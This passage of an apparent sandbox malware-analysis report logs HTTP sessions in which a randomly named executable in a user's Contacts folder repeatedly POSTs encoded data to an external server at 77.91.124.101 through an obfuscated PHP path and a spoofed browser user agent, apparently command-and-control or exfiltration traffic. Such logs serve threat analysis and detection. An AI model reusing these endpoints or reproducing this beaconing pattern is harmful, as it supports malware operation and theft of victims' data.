                                                            Data Ascii: W^XQ[[ZY]WUWUZW[P^XHV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*>(? 4,*\79>?"Q0>>V0-89+, /&G''^)7
                                                            Nov 21, 2023 04:47:53.998054028 CET | 329 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:53 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            4 | 192.168.2.5 | 49716 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:28.852116108 CET | 158 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:29.050067902 CET | 159 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:29.050301075 CET | 161 | OUT | Data Raw: 57 5b 5d 5a 5e 5d 5a 5d 5d 57 55 57 55 59 57 55 50 5f 58 44 56 57 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]Z^]Z]]WUWUYWUP_XDVWW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+8)Y?*348% 6)#.S$."V&#%:;(/_8>&G''^)
                                                            Nov 21, 2023 04:47:29.257055044 CET | 162 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            40 | 77.91.124.101 | 80 | 192.168.2.5 | 49754 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:54.317177057 CET | 330 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:54.517254114 CET | 330 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:54.517621040 CET | 332 | OUT | Data Raw: 57 5f 5d 5b 5e 59 5a 59 5d 57 55 57 55 56 57 54 50 5d 58 43 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_][^YZY]WUWUVWTP]XCV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);"<.=U'.4[ +0)'.'3=.]!?</>&G''^)
                                                            Nov 21, 2023 04:47:54.721622944 CET | 333 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            41 | 77.91.124.101 | 80 | 192.168.2.5 | 49755 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:54.726335049 CET | 334 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:54.924632072 CET | 334 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:54.924892902 CET | 336 | OUT | Data Raw: 52 5c 58 5b 5e 59 5a 5f 5d 57 55 57 55 5e 57 5b 50 59 58 45 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\X[^YZ_]WUWU^W[PYXEV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*%X?>*3/4- 5_) *$["'W9)(7],.&G''^)
                                                            Nov 21, 2023 04:47:55.129759073 CET | 339 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 05 27 2c 23 00 20 23 2b 1e 28 3a 07 14 3a 58 2e 44 28 55 35 5f 32 04 34 13 27 17 25 1b 3f 59 2f 05 27 00 2c 56 20 25 33 04 3d 1a 21 5a 0c 1d 25 04 36 5e 27 55 2b 07 23 02 2b 2d 0e 5e 26 22 3f 15 3c 3e 27 16 23 0a 3b 5d 31 30 3c 57 3b 06 31 59 3a 01 3d 18 25 5a 2a 1d 22 3d 23 5f 0c 14 24 08 21 31 02 07 23 33 25 09 21 09 34 15 23 24 2c 0d 24 2d 24 56 25 2b 21 5e 2a 28 0e 56 31 51 20 50 26 29 2c 0a 26 00 23 51 28 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !',# #+(::X.D(U5_24'%?Y/',V %3=!Z%6^'U+#+-^&"?<>'#;]10<W;1Y:=%Z*"=#_$!1#3%!4#$,$-$V%+!^*(V1Q P&),&#Q(:&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            42 | 192.168.2.5 | 49756 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:54.853936911 CET | 334 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:55.051373005 CET | 336 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:55.051578045 CET339OUTData Raw: 52 5f 58 59 5e 5f 5a 5a 5d 57 55 57 55 59 57 5b 50 52 58 45 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_XY^_ZZ]WUWUYW[PRXEV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)_?)U?^/B&_ (3:V0[:Q30R9&](?<8&G''^)
                                                            Nov 21, 2023 04:47:55.259167910 CET | 339 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            43 | 192.168.2.5 | 49757 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:55.583935976 CET | 340 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:55.782804012 CET | 341 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:55.789611101 CET343OUTData Raw: 57 5e 58 51 5b 5f 5a 51 5d 57 55 57 55 5d 57 51 50 59 58 48 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XQ[_ZQ]WUWU]WQPYXHVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8%(>R*#_8'9#:X+0&0=0=-++?#]->&G''^)+
                                                            Nov 21, 2023 04:47:55.996412992 CET | 343 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:55 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            44 | 77.91.124.101 | 80 | 192.168.2.5 | 49758 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:56.347644091 CET | 344 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:56.545571089 CET | 344 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:56.545799017 CET347OUTData Raw: 57 58 58 5c 5b 5e 5a 5b 5d 57 55 57 55 5c 57 57 50 52 58 42 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX\[^Z[]WUWU\WWPRXBV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^"?+1>#.7-#9:(=$=$#%.><</>&G''^)/
                                                            Nov 21, 2023 04:47:56.750597000 CET | 347 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:56 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            45 | 192.168.2.5 | 49759 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:57.069133997 CET | 348 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:57.268942118 CET | 348 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:57.269268036 CET351OUTData Raw: 57 59 58 5d 5e 59 5a 5d 5d 57 55 57 55 5f 57 57 50 53 58 46 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX]^YZ]]WUWU_WWPSXFVPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*8=+"=Z/27)9+U)3.&0&,+9<,+Y,&G''^)#
                                                            Nov 21, 2023 04:47:57.475258112 CET | 351 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:57 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            46 | 77.91.124.101 | 80 | 192.168.2.5 | 49760 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:57.801287889 CET | 352 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:57.998136044 CET | 352 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:57.998382092 CET355OUTData Raw: 52 5a 5d 5c 5e 5d 5a 5a 5d 57 55 57 55 59 57 50 50 5f 58 49 56 51 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]\^]ZZ]WUWUYWPP_XIVQWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^)(81);$97)_?3-'-1&#>V.8*X<Z;->&G''^)
                                                            Nov 21, 2023 04:47:58.201750040 CET | 355 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:57 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.5 | 49761 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:47:58.522582054 CET | 356 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Nov 21, 2023 04:47:58.720407963 CET | 356 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:47:58.720709085 CET | 359 | OUT | Data Raw: 52 5a 58 5e 5e 59 5a 5e 5d 57 55 57 55 5c 57 5b 50 5c 58 42 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZX^^YZ^]WUWU\W[P\XBVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8%_?8%?37]/]49*) 90>2Q39-(:^(<<8>&G''^)/
Nov 21, 2023 04:47:58.925018072 CET | 359 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:58 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.5 | 49762 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:47:59.236670971 CET | 360 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Nov 21, 2023 04:47:59.434784889 CET | 360 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:47:59.434998035 CET | 363 | OUT | Data Raw: 52 5d 58 5a 5b 53 5a 5e 5d 57 55 57 55 5f 57 55 50 5a 58 42 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XZ[SZ^]WUWU_WUPZXBVWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*_<1>07[89 &+3V0133>9;]</48&G''^)#
Nov 21, 2023 04:47:59.637718916 CET | 363 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:59 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 77.91.124.101 | 80 | 192.168.2.5 | 49763 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:47:59.960717916 CET | 364 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Nov 21, 2023 04:48:00.159409046 CET | 364 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.338649988 CET | 365 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49717 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:47:29.580786943 CET | 162 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Nov 21, 2023 04:47:29.778557062 CET | 163 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:47:29.778968096 CET | 165 | OUT | Data Raw: 52 5c 5d 5d 5b 59 5f 5e 5d 57 55 57 55 5c 57 57 50 5d 58 49 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]][Y_^]WUWU\WWP]XIVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>=((%= ;Z,4[75])0%0=2031.8>>,7,&G''^)/
Nov 21, 2023 04:47:29.983077049 CET | 165 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:29 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 77.91.124.101 | 80 | 192.168.2.5 | 49764 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:00.333837032 CET | 365 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Nov 21, 2023 04:48:00.531379938 CET | 366 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:00.531569958 CET | 367 | OUT | Data Raw: 52 5d 58 5c 5b 53 5f 5b 5d 57 55 57 55 58 57 5a 50 52 58 45 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
